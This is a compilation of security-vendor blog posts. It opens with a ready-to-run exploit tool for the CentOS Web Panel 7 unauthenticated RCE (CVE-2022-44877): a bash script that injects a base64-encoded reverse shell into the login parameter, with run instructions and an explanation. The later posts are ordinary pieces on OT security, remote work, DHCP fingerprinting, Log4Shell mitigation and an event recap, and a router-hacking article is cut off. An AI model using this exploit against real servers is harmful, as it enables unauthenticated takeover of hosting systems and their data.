Skip to content

Unique exploit: CVE-2022–44877 Exploitation Tool

Here is the exploitation script of the Centos Web Panel 7 — CWP Unauthenticated RCE CVE-2022–44877

The script from here:

https://github.com/mhzcyber/CVE-Analysis/blob/main/CVE-2022%E2%80%9344877/CVE-2022-44877Exploit.sh

How to use the exploitation script:

Run listener:

Make the script executable:

chmod +x CVE-2022-44877Exploit.sh

Run the script:

./CVE-2022-44877Exploit.sh https://192.168.1.108:2031/ root 192.168.1.103 9001

Now we received a connection:

You can watch the exploitation script video here:

https://youtu.be/dtrwrCaE7d8

Code Explanation:

#!/bin/bash

function help {
echo "[-] USAGE: $0 Target_URL Target_username LHOST LPORT"
echo "[-] Example: $0 https://192.168.1.108:2031/ root 192.168.1.100 9001"
exit 1
}

function exploit {
target_url=$1
target_un=$2
lhost=$3
lport=$4

payload="sh -i >& /dev/tcp/${lhost}/${lport} 0>&1"
payload_base64=$(echo -n ${payload} | base64)

target_ip=$(egrep -o '([0-9]{1,3}[.]){3}[0-9]{1,3}' <<< ${target_url})

echo $target_ip

port=$(echo ${target_url} |  grep -oP ':\K\d+')

echo $port

curl -i -s -k -X $'POST' \
-H $'Host: '${target_ip}':'${port} \
-H $'Content-Type: application/x-www-form-urlencoded' \
--data-binary $'username='${target_un}'&password=test&commit=Login' \
-g ${target_url}'login/index.php?login=$(echo${IFS}'${payload_base64}'${IFS}|${IFS}base64${IFS}-d${IFS}|${IFS}bash)'

}

if [[ $# -eq 4 ]]; then
exploit "$1" "$2" "$3" "$4"
else
help
fi

This script has two main functions: help and exploit

The help function will be called if the user does not provide the correct number of arguments when running the script. It will display usage information and an example of how to run the script. 

The exploit function takes four arguments: the target URL, the target username, the local host IP address, and the local port number.

First, 

  • the script defines the payload, which is a command that creates a reverse shell. 
  • The payload is then encoded in base64. 
  • It then extracts the target IP address from the URL and port number,
  • and uses the curl command to send a HTTP post request to the target with the payload in the login= parameter. 
  • The payload is executed on the target server by base64 decoding the payload first and then running the command in bash.

#exploitation #tool #CVE-2022-44877

About Version 2 Limited
Version 2 Limited is one of the most dynamic IT companies in Asia. The company develops and distributes IT products for Internet and IP-based networks, including communication systems, Internet software, security, network, and media products. Through an extensive network of channels, point of sales, resellers, and partnership companies, Version 2 Limited offers quality products and services which are highly acclaimed in the market. Its customers cover a wide spectrum which include Global 1000 enterprises, regional listed companies, public utilities, Government, a vast number of successful SMEs, and consumers in various Asian cities.

About Topia
TOPIA is a consolidated vulnerability management platform that protects assets in real time. Its rich, integrated features efficiently pinpoint and remediate the largest risks to your cyber infrastructure. Resolve the most pressing threats with efficient automation features and precise contextual analysis.

Securing Your Plant Without Shutting It Down: Navigating the Intersection of IT and OT

If one of your organization’s goals for 2023 is to implement a robust OT/ICS cyber security solution (and here’s why it absolutely should be, even if budgets are a little tight!) you may need a little help wading through the plethora of options, making a plan, and selling it to your CISO and board. There are many solutions being marketed out there, and many organizations willing to offer advice.  SCADAfence recently published a vendor-agnostic guide to choosing an OT Cyber Security solution that details why OT cyber security differs from IT cyber security and what you need to know to choose the solution that’s best for your organization. In this post, we’ll delve deeper and explore why a complete integration is so important. The U.S. National Institute of Standards and Technology (NIST) also released a draft version of a detailed technical guide to implementing OT security, with the final edition expected later this year. We suggest you download and read that as well. One important thing to remember is that even if you don’t have a complete OT security solution at the moment, you still are probably not starting from scratch. Enter the so-called expert from IT.

Integration Between OT and IT Is Essential

As we discovered recently on reddit, every control system engineer has a horror story to share about an IT guy who showed up on the floor of the manufacturing facility with a poorly thought out plan to install or upgrade or a cyber security solution. They proceed to scan every device on the OT network with a tool not-quite designed for the job and leave a disaster in their wake. Machines shut down. Production lines halted. Productivity out the window. Fingers pointed directly at the OT engineers. We understand why most OT engineers would prefer to keep IT experts out of the factory, and back in the office, where they belong. But the fact is, OT networks require cyber security protection too. (And because a cyber attack in the OT world risks harming physical safety, not just data, the need is actually higher.) However, as the integration of IT and OT systems becomes increasingly connected in functionality, it’s important to ensure that their cyber security solutions are well-integrated as well. IT systems are usually more mature, based on common operating systems such as Windows OS or Linux, and have more options available. OT systems on the other hand, are often more fragile and built on custom software, but are more critical to an organization’s mission. Therefore, as much as the OT teams might prefer to keep the IT teams out of their workspace, it is important for them to work together. Make sure roles and responsibilities are well-defined and it’s clear who holds final accountability for making sure your facility is secure.

Identify Your Specific Use Case

Before selecting an OT cyber security vendor, it’s essential to prepare and validate a clear list of IT integration use cases, and ensure that your chosen vendor is able to meet those needs A sound and complete integration between OT and IT security solutions should accomplish several things. First, it should allow for the flow of information between the two systems. This means that the OT team can receive alerts and notifications from the IT system, and vice versa. Second, a seamless integration should allow for forensic analysis to be conducted across both systems if needed. Third, remote users that are authenticated by the IT systems, may need access to OT systems as well. Therefore, a proper solution will allow a way for users logging on remotely to get the access they need at the correct level of authorization. This means that the solution should integrate seamlessly with other tools that are already in place. For example, SCADAfence integrates with a number of different security vendors, such as Rapid7, Keysight, and Secureworks. An open API that allows for maximum flexibility is ideal, as it allows you to tailor the integration to your specific use case rather than being limited to pre-set integrations that may not meet your needs.

Increased Visibility And Other OT Needs

In addition to the OT/IT integration, there are many other things to look for in an OT solution. Including, yes, the ability to passively scan the network to create a detailed inventory of every device without causing damage and shutting down the network. Other must-haves include quick installation time, low false positive rates, and tailored risk alerts. These are all covered in detail in the guide as well.  So, when the CISO, IT person or other member of senior management tells you they want to bring in a cyber security expert, instead of tossing them out on their head and bolting the door, invite them in, be prepared, and talk about how best to work together. To get more advice and information about choosing an OT cyber security solution, download our complementary guide.

About Version 2 Limited
Version 2 Limited is one of the most dynamic IT companies in Asia. The company develops and distributes IT products for Internet and IP-based networks, including communication systems, Internet software, security, network, and media products. Through an extensive network of channels, point of sales, resellers, and partnership companies, Version 2 Limited offers quality products and services which are highly acclaimed in the market. Its customers cover a wide spectrum which include Global 1000 enterprises, regional listed companies, public utilities, Government, a vast number of successful SMEs, and consumers in various Asian cities.

About SCADAfence
SCADAfence helps companies with large-scale operational technology (OT) networks embrace the benefits of industrial IoT by reducing cyber risks and mitigating operational threats. Our non-intrusive platform provides full coverage of large-scale networks, offering best-in-class detection accuracy, asset discovery and user experience. The platform seamlessly integrates OT security within existing security operations, bridging the IT/OT convergence gap. SCADAfence secures OT networks in manufacturing, building management and critical infrastructure industries. We deliver security and visibility for some of world’s most complex OT networks, including Europe’s largest manufacturing facility. With SCADAfence, companies can operate securely, reliably and efficiently as they go through the digital transformation journey.

Why we chose to be a fully remote company (and how we make it work)

At runZero, a physical office isn’t what unites us–it’s our mission that brings us together.

We are proud of the fact we are a 100% remote team,distributed across 10 states. From software engineers to product developers, we aim to help organizations keep their networks secure–all from the comfort of our own homes.

People often ask me why we chose to be a fully remote company from the beginning. As we look to grow, I wanted to take time to elaborate on why we made this choice, the benefits to our company and employees, and how we cultivate our culture without a shared office space.

Why remote-only was the right choice

I joined runZero in late 2020, two years after our founder, HD Moore, started the company. We were in the middle of a pandemic, and our conversations quickly turned to the practicalities of running a startup remotely. Because the whole world was still working remotely due to the pandemic, opening an office just didn’t make sense at the time.

HD felt that he could run the engineering side of things remotely from Austin, TX, and he asked if I needed a sales office in Boston. With all the tools at our fingertips today, I knew I could accomplish most tasks remotely.

My perspective was that working in an office is only important for certain meetings and social interactions. It’s not required for individual, focused-work (unless you have a lot of people in your apartment and need a quiet place to work,but even then, there are other options to meet that need such as coworking spaces).

All that to say: my immediate instinct was runZero could run very well remotely.

Hybrid work is the worst of both worlds

Hybrid usually means employees are in the office around 3 days a week. Employers usually allow people to have some level of freedom over the days they choose to be in the office, so they still get the flexibility from remote work. As a result, it’s difficult to get everyone at the office at the same time.

These hybrid models work in theory, but to me, they seem to bring out the worst parts of each working environment. You still feel isolated (a challenge of remote work), even though you are technically back in the office. You’re able to meet with your colleagues in-person, but never at the same time. So what’s the point?

Hybrid models are also not conducive to productive meetings. Trying to optimize an audio and video setup for in-person and remote meetings is an exercise in futility. One person is drawing on a whiteboard you can barely see, and another is struggling to hear what’s going on through the dreaded Polycom.

Meanwhile, if everyone is on a Zoom call, we can all hear and see each other simultaneously and clearly. Video-conferencing software has improved drastically over the last few years and video and audio quality is heads and tails above typical conferencing options, which allows for efficient and productive meetings.

On a personal level, this is how I prefer to work. I don’t have to sit in a car for two hours a day to get to an office and to run between different meeting rooms at different times. I can prepare healthy meals and pop in a load of laundry in between writing up strategic reports.

Beyond that, however, there are tangible benefits to the company itself that made our decision to become 100% remote an easy one.

Remote work attracts the best talent and gives us an edge over the competition

As things slowly returned to normal in 2021, more companies began to ask employees to come back to the office. However, not all of them wanted to return.

We saw this as a competitive advantage for us. We offered a workplace that allowed for talented individuals to continue working independently, while also being part of a team that shared their values. The certainty that we were never going to ask people to come to an office was a big plus for a lot of people.

In turn, the talent pool we could choose from actually broadened. Now we could pick up people from companies that wanted employees to return when they didn’t want to. We weren’t restricted to a single city either. We could attract quality candidates nationwide and hire, onboard, and train them quickly and efficiently. That’s a cost advantage that we can reinvest in the company.

As a result, our employees have also shared feedback that they are able to maintain a better work-life balance, while also feeling connected to the company mission.

Staying Connected While Apart: How We Cultivate a Company Culture

Admittedly, a formidable challenge to not having a physical workplace is missing out on what I would call ‘water cooler chatter’: those impromptu conversations. Sometimes they were about work, other times about our personal lives. These moments are crucial to helping teams feel connected to a shared experience.

However, company culture is so much more than incidental conversations around the office. It’s about people feeling like they are truly a part of something, and that kind of culture is cultivated thoughtfully and holistically.

First and foremost, understanding our cultural values was key to helping us build a remote culture – or any company culture. Then, our focus shifted to understanding how we help connect people to those values, help people develop 1-on-1 relationships, and foster interpersonal communication that builds the fabric of the company.

Let’s talk about some practical ways we foster and maintain company culture across time zones and locations.

Practical Ways we Manage Culture (and the tools we use!)

We still see the value of in-person interactions. We choose differently.

Our approach to communication is if it involves simply transferring knowledge or information, it can be accomplished virtually (through Slack, Zoom, or recorded video).

For example, we host monthly virtual town halls, which all employees and executives attend. Town halls are an important way to keep information flowing. We are open about our standing as a company, where we are going, and what’s coming next. Transparency is an even higher priority when you operate as a 100% remote company, and that’s why it’s one of our core values.

To set the tone for our time together, we usually kick off each meeting with a soundtrack. One time, after we closed a big customer in the telecommunications space, we played Lady Gaga’s “Telephone”. We take our work seriously, but we also like to have a little fun.

Since our town halls focus mainly on sharing information, they can be virtual. Meanwhile, we reserve in-person events for culture-building activities and interactions.

For example, we had our first ever company-wide meeting in-person in October 2022 in San Diego, an event we plan to host yearly. We had two to three hours of scheduled time during the day that involved sitting in a room pouring over information. The rest of each day was dedicated to team building exercises and common activities to foster lots of unstructured interactions. We also plan to meet up a second time each year for a go-to-market kickoff.

We use communication tools effectively and creatively

As you can expect, we use Slack for work-related communications, including weekly one-on-ones and asynchronous communications on important work matters.

We also use it as a way for everyone to connect. Lots of people check in with each other in the morning on the #casual-random Slack channel. We have a channel for foodies, movies, books, pets, kids,and many other channels to help employees connect who live in the same geographical area and sometimes get together in-person.

When you work remotely, almost every interaction is scheduled, and it can start to feel too structured. To help with this, we use Donut.com; it picks two random people within the company’s Slack that haven’t chatted in a while and pairs them up that month for a 30 minute one-on-one meeting. This meeting has no specific business purpose; it is simply there to mimic–to some degree–those casual water cooler conversations. This tool is a great way to make those types of conversations happen, and we have received positive feedback from employees who have built relationships this way.

Another tool we have used is called Gather.Town. You walk around a room that looks like an 8-bit game. As you wander, you can hear and see people standing near you (virtually), similar to a cocktail party. It’s a fun, gamified way to have a sort of happy hour with colleagues.

Our Head of People, Madison Smiser, has also been organizing company coffees (some virtual, some in-person where possible), show and tells, and breakout groups. We certainly don’t have it all figured out, but we are always listening to feedback and trying out new things. We know that socializing is an important part of building culture inside a company (remote or not).

Is going remote the right choice for you?

Truthfully, remote work is not for everyone, and that’s okay. Some people don’t have the physical workspace or environment to work remotely, while others work in service-based industries or manufacturing where it’s not a feasible option.

There are certainly challenges to running a remote company, but at the end of the day it can contribute positively to employee satisfaction and culture. There is something fascinating about the level of trust that binds a team together when everyone works remotely. It’s a benefit that comes from being in completely different places and, yet, still feeling connected.

If you’re interested in joining a fully remote workplace that’s building culture in creative ways, check out our Careers page.

About Version 2 Limited
Version 2 Limited is one of the most dynamic IT companies in Asia. The company develops and distributes IT products for Internet and IP-based networks, including communication systems, Internet software, security, network, and media products. Through an extensive network of channels, point of sales, resellers, and partnership companies, Version 2 Limited offers quality products and services which are highly acclaimed in the market. Its customers cover a wide spectrum which include Global 1000 enterprises, regional listed companies, public utilities, Government, a vast number of successful SMEs, and consumers in various Asian cities.

About runZero
runZero, a network discovery and asset inventory solution, was founded in 2018 by HD Moore, the creator of Metasploit. HD envisioned a modern active discovery solution that could find and identify everything on a network–without credentials. As a security researcher and penetration tester, he often employed benign ways to get information leaks and piece them together to build device profiles. Eventually, this work led him to leverage applied research and the discovery techniques developed for security and penetration testing to create runZero.

Strengthening IoT Security with Cloud-Native DHCP Listening

Enhanced IoT Fingerprinting & Security with Cloud-Native DHCP Listening

More Like the Internet of Everything

With the explosion of new devices connecting to the internet, IoT (or, the Internet of Things) really might as well be called IoE (or, the Internet of Everything.) The use cases for always-connected devices span across industries – from facilities that can now better manage energy usage according to peak customer traffic, and medical devices that can adjust medication levels in seconds, to retail warehouses that can track inventory down to the last widget. It’s undeniable that IoT has been a game-changer.

 

That’s not to say, however, that IoT does not present some unique challenges – specifically for network security professionals.

Who Are You?

The devices themselves tend to run on extremely lean operating systems, which means they don’t run typical monitoring protocols like SNMP. There’s also no possibility of installing extra software like agents. They’re designed to be easy to set up; just point them at an internet connection, which means any user can add an IoT device.

This creates an especially tough situation for IT administrators. After all, an essential part of zero trust security is knowing what is on your network, which means you need to make sure operating systems and firmware are patched and up-to-date to close the gap on any known vulnerabilities. But how can you know what’s on your network if the devices don’t report back specific identification in any way?

This problem has become so common it has a name – “Shadow IoT” – and it’s so prevalent that 80% of IT leaders found devices on their network they didn’t know about.

IoT Fingerprinting to the Rescue!

To combat this, several companies that make security tools like Network Access Control software have begun offering IoT Fingerprinting. This is a way to gather information about IoT devices like model, OS or Firmware, and manufacturer without requiring the devices to report in. While an absolute game changer for helping secure these devices, it is not without its challenges.

The biggest issue is that there is no real standard across devices – most don’t support Simple Network Management Protocol (SNMP) or Windows Management Instrumentation (WMI). Some devices support Universal Plug & Play (UnPNP) or Bonjour, but typically you only find that on consumer devices like a Roku or an AppleTV. Some Cisco devices support CDP (Cisco Discovery Protocol), but that doesn’t cover other vendors; some may use LLDP instead (Link Layer Discover Protocol) but typically you will find that only on phones, video conferencing equipment, and commercial IP surveillance cameras.

Port scanning via Nmap & TCP have more drawbacks – they scale very poorly. Also, with increased pressure on IoT manufacturers to pay more attention to security, more and more devices are being shipped with all ports turned off. And of course, the most basic firewall will raise alarms when a port scan is detected.

MAC address will get you some information, but they pose some challenges too. The first six hexadecimal digits of a MAC address are called the OUI and they identify the manufacturer. This is useful, but also not super accurate in the sense that if you find an HP device on your network, that does little to tell you what it exactly is. It also does not tell you any information about operating systems or firmware.

DHCP at first seems like a great option – when a device connects to a network, its first step is typically to request an IP from a DHCP server. During the DORA process (Discovery, Offer, Request, Acknowledge) much information is passed back and forth, including information to fingerprint the device. Many enterprise switches support a process called DHCP Gleaning, where the switch listens for DHCP requests Switchport interfaces and is then captured as a device sensor and sent along with RADIUS accounting info.

The problem here is that not all switches support DHCP Gleaning. For the ones that don’t, how do you get the information collected by the DHCP server to your network access control software to do the actual fingerprinting? Some solutions have you install an on-prem DHCP forwarder, which signs your IT team up to deal with deploying and maintaining yet another server, upgrades, patches, etc. Even worse, this separate forwarder creates overhead on your network that may impact your users and sensitive traffic.

So, all hope is lost, and there’s no reliable way to accurately fingerprint all your IoT Devices, but there’s great news coming.

Portnox’s DHCP Listener Heads to the Cloud

Keep all the magic of a cloud-based solution – vendor agnostic, no maintenance, no upgrades, no worries – AND get the most accurate fingerprinting of all your IoT devices as part of your comprehensive zero-trust solution!

You can easily configure your network devices to send the data your DHCP server already gathers throughout the course of handing out IP Addresses to the Portnox SaaS DHCP listener.

All you need to enable is a layer 3 device on the same subnet as the devices you want fingerprinted, that is NOT also acting as a DHCP server. You will need to configure the DHCP helper, which will forward this information to us. Most devices support using a DHCP helper – in fact, most devices support running multiple, so no need to sacrifice anything in your current architecture. The helper will forward DHCP and BOOTP broadcasts on directly connected subnets and relay them to the Portnox DHCP listener on port 67.

If you have bandwidth considerations, you can lay them to rest – DHCP is a very lightweight protocol, consuming less than 350 bytes per request on average. Since we are not making DHCP offers, the only bandwidth is from the clients DHCP request that is forwarded from the clients.

So let’s say you have 500 clients. A DHCP lease is typically 24 hours, with clients renewing at 12 hours. That means you’d spend 175 kilobytes of total data every 12 hours…even a 28.8 baud modem could handle that request.

We use this formula to calculate bandwidth:

(((TOTAL # OF DHCP CLIENTS X 350BYTES) X2 FOR 24 HOURS) X8 CONVERT TO BITS)/ 86400 SECONDS IN A DAY

IN EXCEL THE EQUIVALENT FORMULA WOULD READ: =(((500 *350)*2)*8)/86400

This first-of-its-kind SaaS DHCP listener is easy to set up, and opens a whole new world of accurate fingerprinting for IoT Devices – click here to get started!

About Version 2 Limited
Version 2 Limited is one of the most dynamic IT companies in Asia. The company develops and distributes IT products for Internet and IP-based networks, including communication systems, Internet software, security, network, and media products. Through an extensive network of channels, point of sales, resellers, and partnership companies, Version 2 Limited offers quality products and services which are highly acclaimed in the market. Its customers cover a wide spectrum which include Global 1000 enterprises, regional listed companies, public utilities, Government, a vast number of successful SMEs, and consumers in various Asian cities.

About Portnox
Portnox provides simple-to-deploy, operate and maintain network access control, security and visibility solutions. Portnox software can be deployed on-premises, as a cloud-delivered service, or in hybrid mode. It is agentless and vendor-agnostic, allowing organizations to maximize their existing network and cybersecurity investments. Hundreds of enterprises around the world rely on Portnox for network visibility, cybersecurity policy enforcement and regulatory compliance. The company has been recognized for its innovations by Info Security Products Guide, Cyber Security Excellence Awards, IoT Innovator Awards, Computing Security Awards, Best of Interop ITX and Cyber Defense Magazine. Portnox has offices in the U.S., Europe and Asia. For information visit http://www.portnox.com, and follow us on Twitter and LinkedIn.。

Why Log4Shell Remains a Major Risk for Corporate Networks.

Log4Shell is Still Lurking.

What Does it Mean for Corporate Networks?

What is Log4Shell & What Does it Affect?

In December 2021, the Log4j vulnerability, also known as Log4Shell, was made public. Log4j is a logging utility for Java that allows developers to output log messages from their applications to various destinations, such as the console, a file, or a database. Like any software, log4j is susceptible to vulnerabilities that can be exploited by attackers. Logging tools are used by developers to keep track of activity within a certain application.

To take advantage of Log4Shell, all attackers have to do is trick the system into logging a unique piece of code. They can then take over their target’s computer and install malware or launch other types of cyber attacks.

Log4j’s handling of serialized data is one area where it might be vulnerable. An attacker may be able to insert harmful code into serialized data supplied to the log4j library in some versions of log4j. The injected code may be executed if the log4j library deserializes this data, which might provide the attacker access to the system without authorization or enable them to carry out other nefarious deeds.

A year later, the issue still posses’ great risks as was noted by an announcement by both the FBI and the Cybersecurity and Infrastructure Security Agency on a network attack by Iranians at a federal civilian executive branch agency. With the relentless rise of attacks and vulnerabilities dominates the cybersecurity landscape, organizations are coping with a compound threat: the vulnerabilities from prior years that may not have been sufficiently addressed as well as the new ones that surface every year.

How Does Log4Shell Affect Corporate Networks?

What makes the Log4j vulnerability even more dangerous is how ubiquitous the Log4j 2 library is. It can be found in large and small services as well as significant platforms like VMware and Amazon Web Services. Organizations across the industry have included Apache Log4j 2 into a variety of applications because it is one of the most used logging frameworks on the internet. This includes well-known cloud providers like Twitter and Stream as well as platforms like Apple, Google, Microsoft, and Cloudflare.

The vulnerability’s impact is amplified in particular by how simple it is to exploit. The Log4j library manages how code and data are logged by applications. The flaw gives an attacker access to a string, which they can use to fool the application into requesting and executing malicious code they have control over. Attackers can thereby remotely take control of any internet-connected service that makes use of specific versions of the Log4j library, regardless of where in the software stack it is located.

The subject is pertinent to more discussions about the software supply chain and how it is more challenging to find and fix vulnerable code since many firms do not have a complete accounting of all the software they use in their systems. However, even if a company has a record of every piece of software it has purchased or installed, those programs may still contain other software components that the end user isn’t precisely aware of and didn’t intentionally choose. Because of this intricate web of dependencies between the impacted platforms and services, patching can be a challenging and time-consuming process.

Attackers are still actively using Log4Shell everywhere they can, from criminal hackers looking for a way into targets’ systems to attackers with the support of the Chinese and Iranian governments who use the exploit in their espionage operations. Moreover, latest analysis released by Tenable Wednesday revealed that the issue still exists as of October 1, 2022, and that 72% of organizations are still exposed to Log4Shell. Some companies that first mitigated the vulnerability are included in that figure. Tenable conducted the study while gathering information from more than 500 million tests.

How can Companies Mitigate This Vulnerability?

Any company can fall victim to Log4Shell. Previous research and data analysis suggest the importance of continually assessing enterprise environments for the flaw, as well as other critical vulnerabilities.

Companies should update their own applications and infrastructure that use Log4j as well as third-party applications immediately. Corporate networks need enhanced security solutions that can immediately and automatically identify vulnerable systems and their dependencies, and help you prioritize the most critical systems to update first.

Prioritizing Java processes that are accessible via public networks and have the potential to leak critical information to malicious intruders is the most effective strategy for solving this problem. Throughout this process, it is important to keep a list of all known and suspected susceptible assets and what is being done with them.

Since malicious cyber actors may compromise an asset and then patch it to cover their tracks, it is crucial to keep track of patching. In order to determine whether a threat actor may have patched an asset, organizations should maintain a detailed record of the susceptible assets they have patched.

Even with proper record keeping, it is important to verify the success of the mitigation. Use the appropriate tools and techniques to scan the patched asset. Utilize different techniques to confirm that the mitigation was properly implemented while keeping a careful eye on the asset. Look out for updates from vendors to the asset’s software.

For information on known affected products and patches, go check CISA’s Github page the GitHub page for CISA. CISA will keep the repository updated when vendors issue patches.

Given the widespread exploitation of this vulnerability, it is also advisable to conduct hunt procedures. Organizations should assume that their assets have been compromised to simulate incident response procedures. It should involve treating assets as compromised, inspecting and monitoring accounts across your enterprise that exist on or connect to assets that use Log4j. These are among the ways that corporate networks can be protected from the vulnerability.

It goes without saying that all firewalls and intrusion detection systems should be updated. The patches could filter or block LDAP and RMI traffic attempting to reach malicious LDAP servers. It is also useful to ​implement general sanitation practices like multi-factor authentication and strict VPN policies. Finally, it was noted that a design flaw in the JNDI Lookup plugin is primarily to blame for this critical vulnerability. By disabling the Jndi Lookup class, the logger will be unable to take action based on data found in the log. JNDI is however disabled by default in version 2.16.0 of Log4j.

What is the Future for Log4Shell & Cybersecurity

Recognizing the problem is the first step in solving a complicated issue like cybersecurity vulnerabilities. Just a few years ago, security breaches were a taboo subject that was rarely addressed outside of the computer sector, and firms that had experienced them were unwilling to reveal and provide specifics. The latest round of public hacks has elevated cybersecurity to the level of board discussion for many businesses. Additionally, customers can now evaluate businesses based on how they choose to handle these incursions.

Another hopeful aspect is the fact that cybersecurity education is becoming more mainstream. Degree programs in cybersecurity are currently available from many prestigious colleges, including Stanford, MIT, and University of California, Berkeley. Similar initiatives are being made in the tech and cybersecurity sectors. There will be a record number of highly skilled professionals in the security sector. They also gain knowledge from the intrusions and weaknesses. News stories from today become case studies and precedents in the law of tomorrow.

It is also encouraging to see that vendors are building new technology with security in mind. While not all technologies will benefit from this, and the environments won’t be future-proofed, it represents a significant shift from decades of development practices. Although it will take time for these modifications to take effect, keep in mind that the choices that led to the creation of Log4Shell were made years ago.

Seeing more public-private partnerships being formed is a step in the right direction. Companies and governmental organizations are working together to exchange knowledge about vulnerabilities and incursions. Organizations are sharing technical information and more comprehensive strategic lessons learned for the good of everybody. In order to respond and address these problems more quickly and effectively, this happens at numerous levels and across a variety of teams.

These are positive moves the security sector sorely needs to take. It raises the possibility that the world will have considerably more robust and resilient cyber defenses in future.

About Version 2 Limited
Version 2 Limited is one of the most dynamic IT companies in Asia. The company develops and distributes IT products for Internet and IP-based networks, including communication systems, Internet software, security, network, and media products. Through an extensive network of channels, point of sales, resellers, and partnership companies, Version 2 Limited offers quality products and services which are highly acclaimed in the market. Its customers cover a wide spectrum which include Global 1000 enterprises, regional listed companies, public utilities, Government, a vast number of successful SMEs, and consumers in various Asian cities.

About Portnox
Portnox provides simple-to-deploy, operate and maintain network access control, security and visibility solutions. Portnox software can be deployed on-premises, as a cloud-delivered service, or in hybrid mode. It is agentless and vendor-agnostic, allowing organizations to maximize their existing network and cybersecurity investments. Hundreds of enterprises around the world rely on Portnox for network visibility, cybersecurity policy enforcement and regulatory compliance. The company has been recognized for its innovations by Info Security Products Guide, Cyber Security Excellence Awards, IoT Innovator Awards, Computing Security Awards, Best of Interop ITX and Cyber Defense Magazine. Portnox has offices in the U.S., Europe and Asia. For information visit http://www.portnox.com, and follow us on Twitter and LinkedIn.。

Pandora FMS Journey to the Middle East, Black Hat MEA 2022

At Pandora FMS we like to travel! Traveling, meeting people, bonding… And barbecues or country getaways are great, but there’s nothing we like more here than an event focused on technology! That’s why we accepted the exceptional invitation to the latest Black Hat MEA edition held at Riyadh, Saudi Arabia last November. There we went, to the Middle East no less, with our stand and our roll up, to present our respects, and services, to the most cutting-edge community that exists out there.

Pandora FMS visits Black Hat MEA 2022, the event of the year

For those who are not aware of all this stuff: Black Hat MEA is a fairly iconic cybersecurity event, with year-round ethical hacking courses and offensive security classes that everyone wants to attend. A global event that pushes the secrets of data security to the limit. The largest information security trade show held anywhere in the world in 2022, bringing frontline and technology-loving companies together annually in a professional and festive atmosphere. But I will explain. We better talk to our lucky Pandora FMS colleagues who were able to attend this latest edition on behalf of our community. Alberto Sánchez, Systems Technician and Alexander Rodríguez, Salesperson.

Alexander, what would you say Black Hat MEA was like for Pandora FMS?

I think the event was a great chance! Having a space within the booth provided by our exclusive partner in Saudi Arabia, LoopTech, was wonderful.
It allowed us several positive meetings with clients. In addition, we had the honor to receive the visit of his Excellence Advisory Mr. Turki Alshikh. We were able to present him not only Pandora FMS, but the rest of the solutions in the field of Cybersecurity that our partner Looptech has. We were very happy to receive a lot of positive feedback from the product. Without a doubt, having participated in this event will help us achieve a better position in the Middle East market.

What did you learn from a place like Saudi Arabia and its people?

Saudi Arabia surprised me a lot. It is a country that is growing very fast. Although it still retains authenticity in the mud buildings in the middle of the desert and the spectacular sunsets on the dunes. Its people are super friendly and are willing to help you in everything necessary to make your stay as pleasant as possible. Most people speak English so it was very easy to communicate. And I was hugely impressed that everything there is “go big or go home”: great plates of food, huge malls… I would go visit the country again, without a doubt, to continue finding out more about its culture.

And you, Alberto? What do you think Pandora FMS contributed to Black Hat MEA?

I believe at least that Pandora FMS contributed to difference and originality, compared to the rest of solutions that showed up to the event. As you already know, Black Hat MEA was focused in cybersecurity, meaning there were thousands aimed at email or mobile security, others focused in failure detection and there were those that avoid intruder access to devices. Well Pandora FMS, among all of them, proved to be the tool that better looked after device health.  That its essential security feature is simply to prevent device malfunction thanks to monitoring, was something that stood out above the rest.

Any special memories of such an incredible journey?

It’s a tough question, because the whole trip was incredible. The kindness and “brotherhood” of the people was shocking. It was surprising the diversification of cultures that we experienced with people from all over the world, and the number of students who visited us asking really difficult questions to answer… But, if you insist, I’ll tell you a very funny moment that stuck with me. During a demo we could see that a group of students from the women’s university in Riyadh stared at us and laughed. When we finished the demo, we invited them to ask things about Pandora FMS and we took the opportunity to ask them why they were laughing during my demo, you know, in case we had failed at something… Their answer, while laughing, was that the word “Pandora” in Arabic is “Tomato”.  For the rest of the event we struggled, at the booth, to say Pandora FMS without a smile on our faces.

About Version 2 Limited
Version 2 Limited is one of the most dynamic IT companies in Asia. The company develops and distributes IT products for Internet and IP-based networks, including communication systems, Internet software, security, network, and media products. Through an extensive network of channels, point of sales, resellers, and partnership companies, Version 2 Limited offers quality products and services which are highly acclaimed in the market. Its customers cover a wide spectrum which include Global 1000 enterprises, regional listed companies, public utilities, Government, a vast number of successful SMEs, and consumers in various Asian cities.

About PandoraFMS
Pandora FMS is a flexible monitoring system, capable of monitoring devices, infrastructures, applications, services and business processes.
Of course, one of the things that Pandora FMS can control is the hard disks of your computers.

What happens when your router is hacked?

Most people understand that routers can be hacked, but not everybody realizes just how damaging this kind of cyberattack can be. In this article, I will explain exactly how a hacker can target your router, what the consequences could be, and what you can do to protect yourself.

Most users underestimate the risk

No one wants to be hacked, but it’s easy to come up with excuses for not addressing router security issues — excuses like:

  • Hackers don’t want to hack me (aka: “I have nothing to hide” or “My data isn’t valuable to anyone”).

  • It’s too complicated to secure my router and configure it properly.

  • I assume that it’s secure by design (aka: “I trust my ISP to secure it”).

Do these excuses look reasonable to you? Maybe, but the truth is that most hackers would be happy to attack your router if it’s not properly protected, especially if they can do so quickly.

Securing your router is not technically complicated – you don’t need an IT specialist to keep your router safe anymore than you need an automobile engineer to drive your car. Making sure your router is protected should be a standard part of internet use.

Finally, you should not trust your internet service provider (ISP) to keep you safe. More often than not, its security measures are inadequate.

Types of vulnerabilities

Routers are commonly attacked using five main methods. In all the cases, an attacker gets root access (also known as administrative access) and gains full control of the device. The following list begins with the most unlikely and challenging hacks and ends with most common methods, which are also the easiest for the hacker. Each method also comes with an example of the tools and exploits a hacker could use to carry them out.

Physical (Hacking level: extremely difficult)

A physical attack requires the hacker to get physical access to your router. If they manage this, they can bypass security measures and get full administrator access. This process usually involves connecting the router to special hardware (in most cases, a serial console or JTAG).

While it may be a challenge for them to get close to your home router, hackers can use other ways to gain physical access to these devices. For example, they could target an outdoor wireless extender placed in the yard or a wireless router in a hotel that is used by guests.

  • Example: Almost any device with easy access to TTL or JTAG (for example, D-Link DIR-825AC) could be used to launch this hack. JTAG can also be used legitimately to unlock and customize a router.

Local authenticated (Hacking level: moderately difficult)

To perform a local authenticated attack, a hacker must connect to your LAN (local area network) or Wi-Fi. Usually this involves connecting a tiny device to a free network socket or cracking a weak wireless password.

The hacker must also know the default administrator’s password (or be able to brute force it). Collections of default router passwords are available to hackers online as well as tools that allow them to brute force weak passwords. Infecting a local connected device, like a laptop or smartphone, could give the hacker the same level of access to your local network.

Local unauthenticated (Hacking level: challenging)

